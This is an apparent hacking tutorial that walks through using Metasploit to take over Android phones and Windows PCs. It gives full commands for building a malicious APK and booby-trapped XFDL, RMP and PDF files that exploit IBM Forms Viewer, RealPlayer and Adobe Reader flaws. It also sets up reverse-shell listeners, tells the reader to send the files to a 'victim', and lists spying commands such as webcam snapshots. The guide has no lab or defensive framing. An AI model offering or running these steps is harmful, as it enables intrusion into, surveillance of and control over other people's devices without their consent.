Hack Android Phone with Metasploit in Kali Linux

Open Kali Linux Terminal and type

msfpayload android/meterpreter/reverse_tcp lhost=192.168.1.6 lport= 443 R > /root/Desktop/files.apk

-p for payload	android/meterpreter/reverse_tcp
Lhost (IP address of your local host)	192.168.1.6
Lport (Port of your local pc)	443
-x format	Output format

Now we successfully generate the malicious apk File, it will stored on your local computer

/root/Desktop/files.apk

Now open your kli linux terminal and type msfconsole

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set lhost 192.168.1.6

set lport 443

exploit

Now send your files.apk files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim Android Phone.

LS

As in Linux, the ‘ls’ command will list the files in the current remote directory.

PS

The ‘ps’ command displays a list of running processes on the target.

Webcam_list

This command provides you a list of all webcams on the target system. Each webcam will have an index number.

Webcam_snap 1

This command take a snapshot for the specified webcam, by default number 1 and will try without argument precision to open the saved snapshot

Remotely Scan Malware/Virus in Victim PC with Metasploit

This module will check a file for malware on VirusTotal based on the checksum.

Exploit Targets

Windows 7

Windows XP

Requirement

Attacker: Kali Linux

Victim PC: Windows 7

Open Kali Linux terminal type msfconsole

Now type use post/multi/gather/check_malware

msf exploit (check_malware)>set REMOTEFILE (Path of the file you want to scan)

msf exploit (check_malware)>set session 1

msf exploit (check_malware)>exploit

Hack Remote Windows 7 PC Using IBM Forms Viewer Unicode Buffer Overflow

This module exploits a stack-based buffer overflow in IBM Forms Viewer. The vulnerability is due to a dangerous usage of strcpy-like function, and occurs while parsing malformed XFDL files, with a long fontname value. This module has been tested successfully on IBM Forms Viewer 4.0 on Windows XP SP3 and Windows 7 SP1.

Exploit Targets

Windows XP SP 3

IBM Forms Viewer 4.0

Requirement

Attacker: Kali Linux

Victim PC: Windows 7

Open Kali Linux terminal type msfconsole

Now type use exploit/windows/fileformat/ibm_forms_viewer_fontname

msf exploit (ibm_forms_viewer_fontname)>set payload windows/meterpreter/reverse_tcp

msf exploit (ibm_forms_viewer_fontname)>set lhost 192.168.1.113 (IP of Local Host)

msf exploit (ibm_forms_viewer_fontname)>exploit

After we successfully generate the malicious xfdl File, it will stored on your local computer

/root/.msf4/local/msf.xfdl

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.113

exploit

Now send your msf.xfdl files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.

Hack Remote PC Using Real Networks RealPlayer Version Attribute Buffer Overflow

This module exploits a stack-based buffer overflow vulnerability in version 16.0.3.51 and 16.0.2.32 of RealNetworks RealPlayer, caused by improper bounds checking of the version and encoding attributes inside the XML declaration. By persuading the victim to open a specially-crafted .RMP file, a remote attacker could execute arbitrary code on the system or cause the application to crash

Exploit Targets

Windows XP SP 3

Real Player 16.0.3.51

Real Player  16.0.2.32

Requirement

Attacker: Kali Linux

Victim PC: Windows XP

Open Kali Linux terminal type msfconsole

Now type use exploit/windows/fileformat/realplayer_ver_attribute_bof

msf exploit (realplayer_ver_attribute_bof)>set payload windows/meterpreter/reverse_tcp

msf exploit (realplayer_ver_attribute_bof)>set lhost 192.168.1.102 (IP of Local Host)

msf exploit (realplayer_ver_attribute_bof)>exploit

After we successfully generate the malicious rmp File, it will stored on your local computer

/root/.msf4/local/msf.rmp

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.102

exploit

Now send your msf.rmp files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.

Hack Remote PC Using Adobe Reader ToolButton Use After Free

This module exploits an use after free condition on Adobe Reader versions 11.0.2, 10.1.6 and 9.5.4 and prior. The vulnerability exists while handling the ToolButton object, where the cEnable callback can be used to early free the object memory. Later use of the object allows triggering the use after free condition. This module has been tested successfully on Adobe Reader 11.0.2, 10.0.4 and 9.5.0 on Windows XP SP3, as exploited in the wild in November, 2013

Exploit Targets

Windows XP SP 3

Requirement

Attacker: Kali Linux

Victim PC: Windows XP

Open Kali Linux terminal type msfconsole

Now type use exploit/windows/fileformat/adobe_toolbutton

msf exploit (adobe_toolbutton)>set payload windows/meterpreter/reverse_tcp

msf exploit (adobe_toolbutton)>set lhost 192.168.1.113 (IP of Local Host)

msf exploit (adobe_toolbutton)>exploit

After we successfully generate the malicious pdf File, it will stored on your local computer

/root/.msf4/local/msf.pdf

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.113

exploit

Now send your msf.pdf files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.